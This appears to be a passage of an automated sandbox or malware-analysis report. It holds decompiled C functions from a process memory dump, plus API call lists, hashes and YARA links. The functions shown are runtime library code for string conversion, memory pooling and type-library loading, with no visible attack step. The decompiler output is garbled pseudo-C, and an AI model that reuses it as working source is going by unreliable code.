					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						L14:
						if(_t81 == 0 || MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12) == 0) {
							L36:
							_t105 = 0;
							goto L37;
						} else {
							_t100 = _v12;
							_t60 = E6E7FDB7B(_t85, _t103, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
							_t105 = _t60;
							if(_t105 == 0) {
								goto L36;
							}
							if((_a12 & 0x00000400) == 0) {
								_t96 = _t105 + _t105;
								_t87 = _t96 + 8;
								asm("sbb eax, eax");
								if((_t96 + 0x00000008 & _t60) == 0) {
									_t101 = 0;
									L30:
									if(_t101 == 0 || E6E7FDB7B(_t87, _t105, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0) == 0) {
										L35:
										E6E7E71E2(_t101);
										goto L36;
									} else {
										_push(0);
										_push(0);
										if(_a28 != 0) {
											_push(_a28);
											_push(_a24);
										} else {
											_push(0);
											_push(0);
										}
										_t64 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
										_t105 = _t64;
										if(_t64 != 0) {
											E6E7E71E2(_t101);
											L37:
											E6E7E71E2(_t81);
											goto L38;
										} else {
											goto L35;
										}
									}
								}
								asm("sbb eax, eax");
								_t66 = _t60 & _t96 + 0x00000008;
								_t87 = _t96 + 8;
								if((_t60 & _t96 + 0x00000008) > 0x400) {
									asm("sbb eax, eax");
									_t101 = E6E7F92A2(_t87, _t66 & _t87);
									_pop(_t87);
									if(_t101 == 0) {
										goto L35;
									}
									 *_t101 = 0xdddd;
									L28:
									_t101 =  &(_t101[4]);
									goto L30;
								}
								asm("sbb eax, eax");
								E6E807800();
								_t101 = _t107;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xcccc;
								goto L28;
							}
							_t70 = _a28;
							if(_t70 == 0) {
								goto L37;
							}
							if(_t105 > _t70) {
								goto L36;
							}
							_t71 = E6E7FDB7B(0, _t105, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
							_t105 = _t71;
							if(_t71 != 0) {
								goto L37;
							}
							goto L36;
						}
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						asm("sbb eax, eax");
						_t81 = E6E7F92A2(_t85, _t72 & _t85);
						_pop(_t85);
						if(_t81 == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6E807800();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x6e7feb1f
0x6e7feb20
0x6e7feb21
0x6e7feb28
0x6e7feb2c
0x6e7feb2d
0x6e7feb33
0x6e7feb39
0x6e7feb3f
0x6e7feb42
0x6e7feb42
0x6e7feb45
0x6e7feb47
0x6e7feb47
0x6e7feb45
0x6e7feb49
0x6e7feb4e
0x6e7feb55
0x6e7feb58
0x6e7feb58
0x6e7feb74
0x6e7feb7a
0x6e7feb7f
0x6e7fed12
0x6e7fed25
0x6e7feb85
0x6e7feb85
0x6e7feb88
0x6e7feb8d
0x6e7feb91
0x6e7febe5
0x6e7febe7
0x6e7febe9
0x6e7fed07
0x6e7fed07
0x00000000
0x6e7fec08
0x6e7fec08
0x6e7fec1a
0x6e7fec1f
0x6e7fec23
0x00000000
0x00000000
0x6e7fec30
0x6e7fec6a
0x6e7fec6d
0x6e7fec72
0x6e7fec76
0x6e7fecc2
0x6e7fecc4
0x6e7fecc6
0x6e7fed00
0x6e7fed01
0x00000000
0x6e7fece3
0x6e7fece5
0x6e7fece6
0x6e7fecea
0x6e7fed26
0x6e7fed29
0x6e7fecec
0x6e7fecec
0x6e7feced
0x6e7feced
0x6e7fecf4
0x6e7fecfa
0x6e7fecfe
0x6e7fed2f
0x6e7fed09
0x6e7fed0a
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7fecfe
0x6e7fecc6
0x6e7fec7d
0x6e7fec7f
0x6e7fec81
0x6e7fec89
0x6e7feca6
0x6e7fecb0
0x6e7fecb2
0x6e7fecb5
0x00000000
0x00000000
0x6e7fecb7
0x6e7fecbd
0x6e7fecbd
0x00000000
0x6e7fecbd
0x6e7fec8d
0x6e7fec91
0x6e7fec96
0x6e7fec9a
0x00000000
0x00000000
0x6e7fec9c
0x00000000
0x6e7fec9c
0x6e7fec32
0x6e7fec37
0x00000000
0x00000000
0x6e7fec3f
0x00000000
0x00000000
0x6e7fec56
0x6e7fec5b
0x6e7fec5f
0x00000000
0x00000000
0x00000000
0x6e7fec65
0x6e7febe9
0x6e7feb98
0x6e7feb9a
0x6e7feb9c
0x6e7feba4
0x6e7febc5
0x6e7febcf
0x6e7febd1
0x6e7febd4
0x00000000
0x00000000
0x6e7febda
0x6e7febe0
0x6e7febe0
0x00000000
0x6e7febe0
0x6e7feba8
0x6e7febac
0x6e7febb1
0x6e7febb5
0x00000000
0x00000000
0x6e7febbb
0x00000000
0x6e7febbb

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E7ED7FA,6E7ED7FA,?,?,?,6E7FED6B,00000001,00000001,F9E85006), ref: 6E7FEB74
__alloca_probe_16.LIBCMT ref: 6E7FEBAC
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E7FED6B,00000001,00000001,F9E85006,?,?,?), ref: 6E7FEBFA
__alloca_probe_16.LIBCMT ref: 6E7FEC91
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F9E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E7FECF4
__freea.LIBCMT ref: 6E7FED01

Part of subcall function 6E7F92A2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E7E865C,00000105,000000FF,24448D6E,00000000,?,6E7D14D7,?,00000103,000000FF), ref: 6E7F92D4

__freea.LIBCMT ref: 6E7FED0A
__freea.LIBCMT ref: 6E7FED2F

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 555e5fbbccd75087e66a212a6cbfa046cddd6ada05d6ade294f405ce3ddd1158
Instruction ID: 4889bf53a15855d3bb1397667d9af267b49914bba1f568517138186818ca70c6
Opcode Fuzzy Hash: 555e5fbbccd75087e66a212a6cbfa046cddd6ada05d6ade294f405ce3ddd1158
Instruction Fuzzy Hash: E551F87261021BEFEB158FE4CE94EAB37A9EB40764F144A29FD14D7264DB34DC42CA50

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7A64, Relevance: 12.1, APIs: 8, Instructions: 73
memoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E7E7A64(void* __edi) {
				intOrPtr _t2;
				void* _t6;
				void* _t12;
				void* _t15;
				void _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t20;

				_t15 = __edi;
				_t2 =  *0x6e81fd00; // 0x0
				if(_t2 != 0) {
					L3:
					if(_t2 != 1) {
						__imp__InterlockedPopEntrySList(_t2);
						_t19 = _t2;
						if(_t19 == 0) {
							_t20 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
							if(_t20 != 0) {
								__imp__InterlockedPopEntrySList( *0x6e81fd00, _t15);
								_t16 =  *_t20;
								if(_t16 == 0) {
									_t1 = _t20 + 0xff0; // 0xff0
									_t17 = _t1;
									do {
										__imp__InterlockedPushEntrySList( *0x6e81fd00, _t20);
										_t20 = _t20 + 0x10;
									} while (_t20 < _t17);
									_t6 = _t20;
									L15:
									return _t6;
								}
								VirtualFree(_t20, 0, 0x8000);
								_t6 = _t16;
								goto L15;
							}
							L9:
							RaiseException(0xc0000017, 0, 0, 0);
							return 0;
						}
						E6E7E8BE0(_t15, _t19, 0, 0xd);
						return _t19;
					}
					_t12 = HeapAlloc(GetProcessHeap(), 8, 0xd);
					if(_t12 == 0) {
						goto L9;
					}
					return _t12;
				}
				if(E6E7E7B5A() == 0) {
					goto L9;
				}
				_t2 =  *0x6e81fd00; // 0x0
				goto L3;
			}

0x6e7e7a64
0x6e7e7a64
0x6e7e7a6f
0x6e7e7a7f
0x6e7e7a82
0x6e7e7a9f
0x6e7e7aa5
0x6e7e7aa9
0x6e7e7acc
0x6e7e7ad0
0x6e7e7aed
0x6e7e7af3
0x6e7e7af7
0x6e7e7b0a
0x6e7e7b0a
0x6e7e7b10
0x6e7e7b17
0x6e7e7b1d
0x6e7e7b20
0x6e7e7b24
0x6e7e7b26
0x00000000
0x6e7e7b26
0x6e7e7b00
0x6e7e7b06
0x00000000
0x6e7e7b06
0x6e7e7ad2
0x6e7e7ada
0x00000000
0x6e7e7ae0
0x6e7e7ab0
0x00000000
0x6e7e7ab8
0x6e7e7a8f
0x6e7e7a97
0x00000000
0x00000000
0x00000000
0x6e7e7a97
0x6e7e7a78
0x00000000
0x00000000
0x6e7e7a7a
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E7E7C0D,00000000), ref: 6E7E7A88
HeapAlloc.KERNEL32(00000000), ref: 6E7E7A8F

Part of subcall function 6E7E7B5A: IsProcessorFeaturePresent.KERNEL32(0000000C,6E7E7A76,00000000,?,6E7E7C0D,00000000), ref: 6E7E7B5C

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6E7E7C0D,00000000), ref: 6E7E7A9F
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6E7E7AC6
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6E7E7ADA
InterlockedPopEntrySList.KERNEL32(00000000), ref: 6E7E7AED
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E7E7B00

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: b880fe0dba0bef1bd18e2a0e1c467ec29efafe7714e4ac16106318556b915d94
Instruction ID: ce48ba471d0d0cb49ad2f8e886c8859118f3f46e01b7e83b5e2ea2b06921f489
Opcode Fuzzy Hash: b880fe0dba0bef1bd18e2a0e1c467ec29efafe7714e4ac16106318556b915d94
Instruction Fuzzy Hash: 31118672641A12BBEB115AAC8D48F67265DEF46785F110875FA0DE69D1D720CC00CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E00F0, Relevance: 10.8, APIs: 7, Instructions: 267
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E6E7E00F0(void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				short _v540;
				void* _v544;
				void* _v548;
				void* _v552;
				void* _v556;
				void* _v560;
				void* _v564;
				char _v565;
				intOrPtr* _v572;
				signed int _v576;
				char _v580;
				struct _CRITICAL_SECTION* _v584;
				signed int _t83;
				signed int _t84;
				intOrPtr _t86;
				intOrPtr _t90;
				signed int _t93;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t117;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				long _t127;
				signed int _t129;
				intOrPtr* _t136;
				intOrPtr* _t137;
				intOrPtr* _t141;
				intOrPtr _t143;
				char _t144;
				intOrPtr* _t148;
				signed short _t152;
				signed int _t158;
				struct _CRITICAL_SECTION* _t159;
				signed short _t161;
				signed int _t162;
				signed int _t164;
				intOrPtr* _t165;
				intOrPtr* _t166;
				signed int _t168;
				struct _CRITICAL_SECTION* _t170;
				signed int _t171;

				_push(0xffffffff);
				_push(E6E8093AC);
				_push( *[fs:0x0]);
				_t83 =  *0x6e81e008; // 0x77dcee0d
				_t84 = _t83 ^ _t171;
				_v20 = _t84;
				_push(__esi);
				_push(__edi);
				_push(_t84);
				 *[fs:0x0] =  &_v16;
				if( *0x6e81ea5c == 0 ||  *0x6e81ea64 == 0) {
					_t158 =  *0x6e8204dc; // 0x6e820488
					_t159 = _t158 + 0x10;
					_v584 = _t159;
					_v8 = 0;
					EnterCriticalSection(_t159);
					_t168 = 0x80004005;
					_v580 = 1;
					if( *0x6e81ea5c != 0) {
						_t168 = 0;
					} else {
						_t136 =  *0x6e81ea54; // 0x6e818538
						_t90 =  *0x6e820500; // 0x61df45ab
						_t152 =  *0x6e81ea5a; // 0x0
						_t161 =  *0x6e81ea58; // 0x1
						_v564 = 0;
						if(_t90 !=  *_t136) {
							L13:
							_t93 = _t161 & 0x0000ffff;
							__imp__#162(_t136, _t93, _t152 & 0x0000ffff, _a4,  &_v564);
							_t168 = _t93;
							goto L14;
						} else {
							_t122 =  *0x6e820504; // 0x476af973
							_t7 = _t136 + 4; // 0x476af973
							if(_t122 !=  *_t7) {
								goto L13;
							} else {
								_t123 =  *0x6e820508; // 0x56106c9a
								_t8 = _t136 + 8; // 0x56106c9a
								if(_t123 !=  *_t8) {
									goto L13;
								} else {
									_t124 =  *0x6e82050c; // 0x98cfddb1
									_t9 = _t136 + 0xc; // 0x98cfddb1
									if(_t124 !=  *_t9 || _t161 != 0xffff || _t152 != 0xffff) {
										goto L13;
									} else {
										_t127 = GetModuleFileNameW( *0x6e81fccc,  &_v540, 0x104);
										if(_t127 != 0 && _t127 != 0x104) {
											_v556 = 0;
											_t129 =  &_v540;
											__imp__#161(_t129,  &_v564);
											_t168 = _t129;
											E6E7DBA40( &_v556);
											L14:
											if(_t168 >= 0) {
												_v552 = 0;
												_v8 = 1;
												_t137 = _v564;
												_t168 =  *((intOrPtr*)( *_t137 + 0x18))(_t137,  *0x6e81ea50,  &_v552);
												_v576 = _t168;
												if(_t168 >= 0) {
													_v8 = 2;
													_t100 = _v552;
													_v544 = _t100;
													if(_t100 != 0) {
														 *((intOrPtr*)( *_t100 + 4))(_t100);
														_t100 = _v552;
													}
													_v548 = 0;
													_v8 = 4;
													_push( &_v548);
													_push(0x6e818038);
													_push(_t100);
													if( *((intOrPtr*)( *_t100))() < 0) {
														L36:
														_t102 = _v544;
													} else {
														_t165 = _v548;
														_v8 = 6;
														_t102 = _v544;
														if(_t102 != 0) {
															if(_t165 == 0) {
																goto L28;
															} else {
																_v560 = 0;
																_v556 = 0;
																 *((intOrPtr*)( *_t102))(_t102, 0x6e817bdc,  &_v560);
																 *((intOrPtr*)( *_t165))(_t165, 0x6e817bdc,  &_v556);
																_t117 = _v560;
																_t148 = _v556;
																_v565 = _t117 == _t148;
																_v8 = 7;
																if(_t148 != 0) {
																	 *((intOrPtr*)( *_t148 + 8))(_t148);
																	_t117 = _v560;
																}
																_v8 = 8;
																if(_t117 != 0) {
																	 *((intOrPtr*)( *_t117 + 8))(_t117);
																}
																_t102 = _v544;
																_t144 = _v565;
															}
														} else {
															if(_t165 != 0) {
																L28:
																_t144 = 0;
															} else {
																_t144 = 1;
															}
														}
														_v8 = 5;
														if(_t144 == 0) {
															_t166 = _t102;
															_t110 = _v548;
															if(_t110 == 0) {
																L33:
																_t102 = 0;
																_v544 = 0;
															} else {
																_push( &_v544);
																_push(0x6e818028);
																_push(_t110);
																if( *((intOrPtr*)( *_t110))() < 0) {
																	goto L33;
																} else {
																	_t102 = _v544;
																}
															}
															if(_t166 != 0) {
																 *((intOrPtr*)( *_t166 + 8))(_t166);
																goto L36;
															}
														}
													}
													_t162 =  *0x6e8204dc; // 0x6e820488
													_t141 = 0;
													 *0x6e81ea5c = _t102;
													_v544 = 0;
													_t56 = _t162 + 4; // 0x6e82048c
													asm("sbb edi, edi");
													_t164 =  ~_t162 & _t56;
													if(_t164 != 0) {
														_push(0x6e80a3c8);
														_t108 = E6E7E4AF4(0xc);
														_v572 = _t108;
														if(_t108 != 0) {
															_t58 = _t164 + 0xc; // 0x6e820494
															_t170 = _t58;
															 *_t108 = E6E7E0060;
															 *((intOrPtr*)(_t108 + 4)) = 0x6e81ea50;
															EnterCriticalSection(_t170);
															_t143 = _v572;
															_t61 = _t164 + 8; // 0x0
															 *((intOrPtr*)(_t143 + 8)) =  *_t61;
															 *((intOrPtr*)(_t164 + 8)) = _t143;
															LeaveCriticalSection(_t170);
															_t168 = _v576;
														}
														_t141 = _v544;
													}
													_v8 = 9;
													_t104 = _v548;
													if(_t104 != 0) {
														 *((intOrPtr*)( *_t104 + 8))(_t104);
														_t141 = _v544;
													}
													_v8 = 0xa;
													if(_t141 != 0) {
														 *((intOrPtr*)( *_t141 + 8))(_t141);
													}
													_v8 = 1;
												}
												_t96 = _v564;
												 *((intOrPtr*)( *_t96 + 8))(_t96);
												_v8 = 0xb;
												_t98 = _v552;
												if(_t98 != 0) {
													 *((intOrPtr*)( *_t98 + 8))(_t98);
												}
												_v8 = 0;
											}
										}
									}
								}
							}
						}
						_t159 = _v584;
					}
					_t86 =  *0x6e81ea5c; // 0x0
					if(_t86 != 0 &&  *0x6e81ea64 == 0) {
						_t168 = E6E7DFEA0(_t159, _t168, _t86);
					}
					LeaveCriticalSection(_t159);
				} else {
				}
				 *[fs:0x0] = _v16;
				return E6E7E440A(_v20 ^ _t171);
			}

0x6e7e00f3
0x6e7e00f5
0x6e7e0100
0x6e7e0107
0x6e7e010c
0x6e7e010e
0x6e7e0111
0x6e7e0112
0x6e7e0113
0x6e7e0117
0x6e7e0124
0x6e7e0136
0x6e7e013c
0x6e7e013f
0x6e7e0146
0x6e7e014d
0x6e7e015a
0x6e7e015f
0x6e7e0166
0x6e7e0470
0x6e7e016c
0x6e7e016c
0x6e7e0172
0x6e7e0177
0x6e7e017d
0x6e7e0183
0x6e7e018f
0x6e7e021a
0x6e7e0228
0x6e7e022d
0x6e7e0233
0x00000000
0x6e7e0195
0x6e7e0195
0x6e7e019a
0x6e7e019d
0x00000000
0x6e7e019f
0x6e7e019f
0x6e7e01a4
0x6e7e01a7
0x00000000
0x6e7e01a9
0x6e7e01a9
0x6e7e01ae
0x6e7e01b1
0x00000000
0x6e7e01c2
0x6e7e01d4
0x6e7e01dc
0x6e7e01f3
0x6e7e01fe
0x6e7e0205
0x6e7e0211
0x6e7e0213
0x6e7e0235
0x6e7e0237
0x6e7e023d
0x6e7e0247
0x6e7e0251
0x6e7e0264
0x6e7e0266
0x6e7e026e
0x6e7e0274
0x6e7e0278
0x6e7e027e
0x6e7e0286
0x6e7e028b
0x6e7e028e
0x6e7e028e
0x6e7e0294
0x6e7e02a4
0x6e7e02aa
0x6e7e02ab
0x6e7e02b0
0x6e7e02b5
0x6e7e03a2
0x6e7e03a2
0x6e7e02bb
0x6e7e02bb
0x6e7e02c1
0x6e7e02c5
0x6e7e02cd
0x6e7e02e0
0x00000000
0x6e7e02e2
0x6e7e02e8
0x6e7e02f3
0x6e7e0305
0x6e7e0316
0x6e7e0318
0x6e7e031e
0x6e7e0326
0x6e7e032d
0x6e7e0333
0x6e7e0338
0x6e7e033b
0x6e7e033b
0x6e7e0341
0x6e7e0347
0x6e7e034c
0x6e7e034c
0x6e7e034f
0x6e7e0355
0x6e7e0355
0x6e7e02cf
0x6e7e02d1
0x6e7e035d
0x6e7e035d
0x6e7e02d7
0x6e7e02d7
0x6e7e02d7
0x6e7e02d1
0x6e7e035f
0x6e7e0365
0x6e7e0367
0x6e7e0369
0x6e7e0371
0x6e7e0390
0x6e7e0390
0x6e7e0392
0x6e7e0373
0x6e7e037b
0x6e7e037c
0x6e7e0381
0x6e7e0386
0x00000000
0x6e7e0388
0x6e7e0388
0x6e7e0388
0x6e7e0386
0x6e7e039a
0x6e7e039f
0x00000000
0x6e7e039f
0x6e7e039a
0x6e7e0365
0x6e7e03a8
0x6e7e03ae
0x6e7e03b0
0x6e7e03b5
0x6e7e03bb
0x6e7e03c0
0x6e7e03c2
0x6e7e03c4
0x6e7e03c6
0x6e7e03cd
0x6e7e03d5
0x6e7e03dd
0x6e7e03df
0x6e7e03df
0x6e7e03e2
0x6e7e03e9
0x6e7e03f0
0x6e7e03f6
0x6e7e03fc
0x6e7e0400
0x6e7e0403
0x6e7e0406
0x6e7e040c
0x6e7e040c
0x6e7e0412
0x6e7e0412
0x6e7e0418
0x6e7e041c
0x6e7e0424
0x6e7e0429
0x6e7e042c
0x6e7e042c
0x6e7e0432
0x6e7e0438
0x6e7e043d
0x6e7e043d
0x6e7e0440
0x6e7e0440
0x6e7e0444
0x6e7e044d
0x6e7e0450
0x6e7e0454
0x6e7e045c
0x6e7e0461
0x6e7e0461
0x6e7e0464
0x6e7e0464
0x6e7e0237
0x6e7e01dc
0x6e7e01b1
0x6e7e01a7
0x6e7e019d
0x6e7e0468
0x6e7e0468
0x6e7e0472
0x6e7e0479
0x6e7e048a
0x6e7e048a
0x6e7e048d
0x6e7e012f
0x6e7e012f
0x6e7e0498
0x6e7e04af

APIs

EnterCriticalSection.KERNEL32(6E820478,77DCEE0D), ref: 6E7E014D
GetModuleFileNameW.KERNEL32(?,00000104), ref: 6E7E01D4
LoadTypeLib.OLEAUT32(?,00000000), ref: 6E7E0205
LoadRegTypeLib.OLEAUT32(6E818538,00000000,00000000,?,00000000), ref: 6E7E022D
EnterCriticalSection.KERNEL32(6E820494), ref: 6E7E03F0
LeaveCriticalSection.KERNEL32(6E820494), ref: 6E7E0406

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
String ID:
API String ID: 1976781235-0
Opcode ID: d23773af3976a51f94968bf3d492bf9cd600522fea5eabe43201b1bd2f2912ce
Instruction ID: 1524c3d8fc90b9e917073a17a9dc155e33a1466c050332e7cafc20454dff754c
Opcode Fuzzy Hash: d23773af3976a51f94968bf3d492bf9cd600522fea5eabe43201b1bd2f2912ce
Instruction Fuzzy Hash: 8DB19E74901219DFDB10CFA4CA58B99B7B5AF5A300F1084E8E809E7B60EB359E45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E8040B1, Relevance: 10.7, APIs: 7, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E8040B1(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E6E7FC3A0(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E6E7F92A2(0, 4);
						_t127 = 0;
						_v12 = _t132;
						E6E7F9268(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x6e81e0b8; // 0x6e81e0b0
								 *_t133 = _t57;
								_t58 =  *0x6e81e0bc; // 0x6e81fdc8
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x6e81e0c0; // 0x6e81fdc8
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x6e81e0e8; // 0x6e81e0b4
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x6e81e0ec; // 0x6e81fdcc
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E6E7F92A2(_t107, 4);
							_v20 = _t134;
							E6E7F9268(0);
							if(_t134 == 0) {
								L11:
								E6E7F9268(_v8);
								E6E7F9268(_v12);
								return _v16;
							}
							_push(_v8);
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E6E7FE84B(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134);
							_t136 = _t135 | E6E7FE84B(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xf, _v8 + 4,  &_v28);
							_v16 = _v8 + 8;
							_t137 = _t136 | E6E7FE84B(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8, 1);
							_t138 = _t137 | E6E7FE84B(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30, _t128);
							if((E6E7FE84B(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34, 0xe) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E6E804048(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						E6E7F9268(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x6e81e0b8;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							E6E7F9268( *((intOrPtr*)(_t100 + 0x7c)));
							E6E7F9268( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}

0x6e8040b1
0x6e8040ba
0x6e8040c1
0x6e8040c4
0x6e8040cd
0x6e8040ec
0x6e8040ef
0x6e8040f4
0x6e8040fb
0x6e80410e
0x6e80410f
0x6e804118
0x6e80411a
0x6e80411d
0x6e804120
0x6e804126
0x6e804129
0x6e80413c
0x6e804144
0x6e80429e
0x6e8042a1
0x6e8042a6
0x6e8042a8
0x6e8042ad
0x6e8042b0
0x6e8042b5
0x6e8042b8
0x6e8042bd
0x6e8042c0
0x6e8042c5
0x6e80422e
0x6e804234
0x6e804238
0x6e80423a
0x6e80423a
0x00000000
0x6e804238
0x6e804151
0x6e804154
0x6e804157
0x6e804160
0x6e8041f5
0x6e8041f8
0x6e804201
0x00000000
0x6e80420a
0x6e804166
0x6e804169
0x6e80416e
0x6e804182
0x6e804196
0x6e8041a2
0x6e8041b0
0x6e8041ca
0x6e8041e6
0x6e804210
0x6e804223
0x6e804214
0x6e804218
0x6e80428b
0x00000000
0x00000000
0x6e80428d
0x6e80428f
0x6e804292
0x6e804294
0x6e804297
0x6e80421e
0x6e804220
0x6e804222
0x6e804222
0x6e804222
0x6e804218
0x6e804228
0x6e80422b
0x00000000
0x6e80422b
0x6e8041eb
0x6e8041f0
0x00000000
0x6e8041f4
0x6e80412e
0x00000000
0x6e804136
0x00000000
0x6e8040d7
0x6e8040d7
0x6e8040d9
0x6e8040dc
0x6e80423c
0x6e80423c
0x6e804244
0x6e804246
0x6e804246
0x6e80424e
0x6e804253
0x6e804257
0x6e80425c
0x6e804267
0x6e80426d
0x6e804257
0x6e804271
0x6e804276
0x6e80427c
0x00000000
0x6e80427c

APIs

_free.LIBCMT ref: 6E804120
_free.LIBCMT ref: 6E80412E
_free.LIBCMT ref: 6E80425C
_free.LIBCMT ref: 6E804267

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
